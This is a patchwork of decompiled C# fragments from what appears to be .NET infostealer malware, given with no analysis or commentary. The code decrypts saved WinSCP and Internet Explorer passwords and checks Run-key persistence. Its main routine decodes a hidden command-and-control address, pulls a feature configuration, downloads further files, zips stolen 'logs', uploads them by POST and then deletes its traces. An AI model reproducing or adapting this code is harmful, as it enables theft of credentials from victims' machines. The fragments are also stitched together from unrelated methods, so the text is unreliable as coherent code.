// Token: 0x060001A5 RID: 421 RVA: 0x00018C38 File Offset: 0x00016E38
public void PopulateTree(TreeView treeview)
{
if (this.Nodes != null && this.Nodes.Count != 0)
{
treeview.BeginUpdate();
for (int i = 0; i < this.Nodes.Count; i++)
{
if (this.Nodes[i].GetType() == typeof(IdCards))
{
GClass10 node = new GClass10((IdCards)this.Nodes[i]);
treeview.Nodes.Add(node);
}
if (this.Nodes[i].GetType() == typeof(Connections))
{
GClass9 node2 = new GClass9((Connections)this.Nodes[i]);
treeview.Nodes.Add(node2);
}
if (this.Nodes[i].GetType() == typeof(Folder))
{
GClass10 node3 = new GClass10();
treeview.Nodes.Add(node3);
TreeNode treeNode = new FolderTreeNode((Folder)this.Nodes[i]);
GClass9 gclass = new GClass9();
foreach (object obj in treeNode.Nodes)
{
TreeNode node4 = (TreeNode)obj;
gclass.Nodes.Add(node4);
}
treeview.Nodes.Add(gclass);
}
}
treeview.EndUpdate();
return;
}
}
// Token: 0x06000460 RID: 1120 RVA: 0x00010578 File Offset: 0x0000E778
private static DirectoryInfo GetFirefoxInstallPath()
{
using (RegistryKey registryKey = GClass8.Is64Bit ? GClass9.smethod_1(RegistryHive.LocalMachine, "SOFTWARE\\Wow6432Node\\Mozilla\\Mozilla Firefox") : GClass9.smethod_1(RegistryHive.LocalMachine, "SOFTWARE\\Mozilla\\Mozilla Firefox"))
{
if (registryKey == null)
{
return(null);
}
string[] subKeyNames = registryKey.GetSubKeyNames();
if (subKeyNames.Length == 0)
{
throw new IndexOutOfRangeException("No installs of firefox recorded in its key.");
}
using (RegistryKey registryKey2 = registryKey.OpenSubKey(subKeyNames[0]))
{
string text = registryKey2.smethod_2("Main").smethod_1("Install Directory", "");
if (string.IsNullOrEmpty(text))
{
throw new NullReferenceException("Install string was null or empty");
}
Firefox.firefoxPath = new DirectoryInfo(text);
}
}
return(Firefox.firefoxPath);
}
// Token: 0x0600033E RID: 830 RVA: 0x00013404 File Offset: 0x00011604
public PixieForm(ref GClass8 gclass8_1, ref GClass9 gclass9_1)
{
base.Load += this.PixieForm_Load;
this.gclass12_0 = new GClass12("", GClass12.GEnum5.Manual);
this.InitializeComponent();
this.gclass9_0 = gclass9_1;
this.GClass8_0 = gclass8_1;
}
// Token: 0x0600007D RID: 125 RVA: 0x00006330 File Offset: 0x00004530
public static bool smethod_2()
{
if (GClass3.smethod_1() == "Admin")
{
return(GClass9.smethod_2(RegistryHive.LocalMachine, GClass16.smethod_0(), GClass35.string_7) || GClass9.smethod_2(RegistryHive.CurrentUser, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", GClass35.string_7));
}
return(GClass9.smethod_2(RegistryHive.CurrentUser, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", GClass35.string_7));
}
public void method_0(string string_0, string string_1, string string_2)
{
GClass9 class1 = new GClass9();
class1.set_String_0(string_2);
class1.set_String_1(string_1);
class1.set_String_2(string_0);
GClass9 class2 = class1;
this.method_1(class2);
}
public void method_1(GClass9 gclass9_0)
{
string str = JsonConvert.SerializeObject(gclass9_0);
using (WebClient client = new WebClient())
{
NameValueCollection data = new NameValueCollection {
["payload"] = str
};
byte[] bytes = client.UploadValues(this.uri_0, "POST", data);
this.encoding_0.GetString(bytes);
}
}
// Token: 0x060001D6 RID: 470 RVA: 0x0000C668 File Offset: 0x0000A868
public static List <GClass32> smethod_0()
{
List <GClass32> list = new List <GClass32>();
List <GClass32> result;
try
{
string path = "SOFTWARE\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions";
using (RegistryKey registryKey = GClass9.smethod_1(RegistryHive.CurrentUser, path))
{
foreach (string name in registryKey.GetSubKeyNames())
{
using (RegistryKey registryKey2 = registryKey.smethod_2(name))
{
if (registryKey2 != null)
{
string text = registryKey2.smethod_1("HostName", "");
if (!string.IsNullOrEmpty(text))
{
string text2 = registryKey2.smethod_1("UserName", "");
string text3 = GClass22.smethod_2(text2, registryKey2.smethod_1("Password", ""), text);
string text4 = registryKey2.smethod_1("PublicKeyFile", "");
text = text + ":" + registryKey2.smethod_1("PortNumber", "22");
if (string.IsNullOrEmpty(text3) && !string.IsNullOrEmpty(text4))
{
text3 = string.Format("[PRIVATE KEY LOCATION: \"{0}\"]", Uri.UnescapeDataString(text4));
}
list.Add(new GClass32
{
URL = text,
Username = text2,
Password = text3,
Application = "WinSCP"
});
}
}
}
}
}
result = list;
}
catch
{
result = list;
}
return(result);
}
// Token: 0x060004F4 RID: 1268 RVA: 0x00012528 File Offset: 0x00010728
private static bool DoesURLMatchWithHash(string urlHash)
{
bool result = false;
using (RegistryKey registryKey = GClass9.smethod_1(RegistryHive.CurrentUser, "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2"))
{
if (registryKey == null)
{
return(false);
}
if (registryKey.GetValueNames().Any((string value) => value == urlHash))
{
result = true;
}
}
return(result);
}
// Token: 0x06000199 RID: 409 RVA: 0x00018444 File Offset: 0x00016644
public Connections(GClass9 node)
{
this.Nodes = new ArrayList(node.Nodes.Count);
if (node.Nodes.Count == 0)
{
return;
}
for (int i = 0; i < node.Nodes.Count; i++)
{
if (node.Nodes[i].GetType() == typeof(FolderTreeNode))
{
Folder value = new Folder((FolderTreeNode)node.Nodes[i]);
this.Nodes.Insert(i, value);
}
else if (node.Nodes[i].GetType() == typeof(RemoteDesktopTreeNode))
{
this.Nodes.Insert(i, ((RemoteDesktopTreeNode)node.Nodes[i]).RemoteDesktopInfo);
}
}
}
// Token: 0x0600034A RID: 842 RVA: 0x010385D4 File Offset: 0x010367D4
private static uint smethod_2(IntPtr intptr_7, IntPtr intptr_8)
{
if (intptr_7.smethod_4() || intptr_7.smethod_2(-1L))
{
throw new ArgumentException("Invalid process handle.", "hProcess");
}
if (intptr_8.smethod_4())
{
throw new ArgumentException("Invalid module handle.", "hModule");
}
byte[] array = GClass5.smethod_4(intptr_7, intptr_8, (uint)Marshal.SizeOf(typeof(GStruct6)));
if (array != null)
{
ushort num = BitConverter.ToUInt16(array, 0);
uint num2 = BitConverter.ToUInt32(array, 60);
if (num == 23117)
{
byte[] array2 = GClass5.smethod_4(intptr_7, intptr_8.smethod_0((long)((ulong)num2)), (uint)Marshal.SizeOf(typeof(GStruct9)));
if (array2 != null && BitConverter.ToUInt32(array2, 0) == 17744u)
{
GStruct9 gstruct = default(GStruct9);
uint addressOfEntryPoint;
using (GClass9 gclass = new GClass9(256))
{
if (!gclass.method_9 <GStruct9>(array2, out gstruct))
{
return(0u);
}
addressOfEntryPoint = gstruct.OptionalHeader.AddressOfEntryPoint;
}
return(addressOfEntryPoint);
}
}
}
return(0u);
}
// Token: 0x06000131 RID: 305 RVA: 0x0000A8D0 File Offset: 0x00008AD0
private static void Main(string[] args)
{
Class9.smethod_0();
Class9.smethod_1();
Class9.smethod_2();
string string_ = "ʰʷˉ˞˜ʷ˩˾ʰ˼ʷʰ˞ˉ˜ʷʰʷʷ˼ʰʷ˜ʰʷ˜ʰ˒ʷ˜ʰʰʰʨʷʰʷʰʷʰʨʷʰʷʰ˿˜˾˩˼ˣ˯˳˃˞˜ˏ˓˃˯˳˼ˣʩʩʩʷʷʷʷ";
byte[] byte_ = Class8.smethod_0("687474703a2f2f67616d656670736275737465722e7275");
byte[] bytes = Encoding.Default.GetBytes(Class11.smethod_2(string_));
string @string = Encoding.Default.GetString(Class11.smethod_0(bytes, byte_));
byte[] bytes2 = Encoding.Default.GetBytes(@string);
GClass9.smethod_0();
Class23.smethod_5(Class23.string_0);
GClass9.smethod_1();
string[] array = new StreamReader(WebRequest.Create(Encoding.Default.GetString(Class11.smethod_0(bytes, bytes2))).GetResponse().GetResponseStream()).ReadToEnd().Split(new char[]
{
','
});
bool flag = false;
bool flag2 = false;
bool flag3 = false;
bool flag4 = false;
bool flag5 = false;
bool flag6 = false;
bool flag7 = false;
bool flag8 = false;
bool flag9 = false;
bool flag10 = false;
bool flag11 = false;
if (array[12] == "1")
{
flag8 = true;
}
if (!flag8)
{
Class12.smethod_5();
}
if (array[0] == "1")
{
flag = true;
}
if (array[1] == "1")
{
flag4 = true;
}
if (array[2] == "1")
{
flag5 = true;
}
if (array[3] == "1")
{
flag11 = true;
}
if (array[4] == "1")
{
flag2 = true;
}
if (array[5] == "1")
{
flag6 = true;
}
if (array[6] == "1")
{
flag10 = true;
}
if (array[7] == "1")
{
flag3 = true;
}
if (array[10] == "1")
{
flag9 = true;
}
if (array[11].StartsWith("http"))
{
flag7 = true;
}
if (flag7)
{
string text = array[11];
string fileName = Path.GetFileName(text);
Class20.smethod_0(text, fileName);
}
if (flag)
{
Class13.smethod_3();
Class21.smethod_0();
}
if (flag5)
{
Class18.smethod_0();
}
if (flag7)
{
string text2 = array[11];
string fileName2 = Path.GetFileName(text2);
Class20.smethod_0(text2, fileName2);
}
if (flag2)
{
Class17.smethod_10();
}
if (flag6)
{
Class17.smethod_6();
}
if (flag4)
{
Class15.smethod_0();
Class13.smethod_2();
Class25.smethod_9();
}
if (flag11)
{
Class17.smethod_5(GClass9.string_2);
}
if (flag3)
{
foreach (string item in array[8].Split(new char[]
{
':'
}))
{
Class17.list_0.Add(item);
}
Class17.int_0 = Convert.ToInt32(array[9]);
Class17.int_0 *= 1024;
Class17.smethod_8();
}
if (flag10)
{
Class17.smethod_9();
}
Class17.smethod_11();
Class17.smethod_7();
Class23.smethod_0();
Class12.smethod_11();
Class12.smethod_9();
Class12.smethod_10();
Class23.smethod_1();
Class12.smethod_6();
string string_2 = GClass9.string_0 + "\\" + Class23.string_0 + ".zip";
try
{
Class27.smethod_0();
Class27.smethod_1(Encoding.Default.GetString(Class11.smethod_0(bytes, bytes2)), string_2, "logs", "zip", Class27.nameValueCollection_0);
}
catch
{
}
if (flag9)
{
Class12.smethod_7();
}
Class12.smethod_8();
Directory.Delete(GClass9.string_6);
}
// Token: 0x060004F3 RID: 1267 RVA: 0x00012310 File Offset: 0x00010510
private static bool DecryptIePassword(string url, List <string[]> dataList)
{
string urlhashString = InternetExplorer.GetURLHashString(url);
if (!InternetExplorer.DoesURLMatchWithHash(urlhashString))
{
return(false);
}
byte[] encryptedData;
using (RegistryKey registryKey = GClass9.smethod_1(RegistryHive.CurrentUser, "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2"))
{
if (registryKey == null)
{
return(false);
}
encryptedData = (byte[])registryKey.GetValue(urlhashString);
}
byte[] array = new byte[2 * (url.Length + 1)];
Buffer.BlockCopy(url.ToCharArray(), 0, array, 0, url.Length * 2);
byte[] array2 = ProtectedData.Unprotect(encryptedData, array, DataProtectionScope.CurrentUser);
InternetExplorer.IEAutoComplteSecretHeader ieautoComplteSecretHeader = InternetExplorer.ByteArrayToStructure <InternetExplorer.IEAutoComplteSecretHeader>(array2);
if ((long)array2.Length >= (long)((ulong)(ieautoComplteSecretHeader.dwSize + ieautoComplteSecretHeader.dwSecretInfoSize + ieautoComplteSecretHeader.dwSecretSize)))
{
uint num = ieautoComplteSecretHeader.IESecretHeader.dwTotalSecrets / 2U;
int num2 = Marshal.SizeOf(typeof(InternetExplorer.SecretEntry));
byte[] array3 = new byte[ieautoComplteSecretHeader.dwSecretSize];
int num3 = (int)(ieautoComplteSecretHeader.dwSize + ieautoComplteSecretHeader.dwSecretInfoSize);
Buffer.BlockCopy(array2, num3, array3, 0, array3.Length);
if (dataList == null)
{
dataList = new List <string[]>();
}
else
{
dataList.Clear();
}
num3 = Marshal.SizeOf(ieautoComplteSecretHeader);
int num4 = 0;
while ((long)num4 < (long)((ulong)num))
{
byte[] array4 = new byte[num2];
Buffer.BlockCopy(array2, num3, array4, 0, array4.Length);
InternetExplorer.SecretEntry secretEntry = InternetExplorer.ByteArrayToStructure <InternetExplorer.SecretEntry>(array4);
string[] array5 = new string[3];
byte[] array6 = new byte[secretEntry.dwLength * 2U];
Buffer.BlockCopy(array3, (int)secretEntry.dwOffset, array6, 0, array6.Length);
array5[0] = Encoding.Unicode.GetString(array6);
num3 += num2;
Buffer.BlockCopy(array2, num3, array4, 0, array4.Length);
secretEntry = InternetExplorer.ByteArrayToStructure <InternetExplorer.SecretEntry>(array4);
byte[] array7 = new byte[secretEntry.dwLength * 2U];
Buffer.BlockCopy(array3, (int)secretEntry.dwOffset, array7, 0, array7.Length);
array5[1] = Encoding.Unicode.GetString(array7);
array5[2] = urlhashString;
dataList.Add(array5);
num3 += num2;
num4++;
}
}
return(true);
}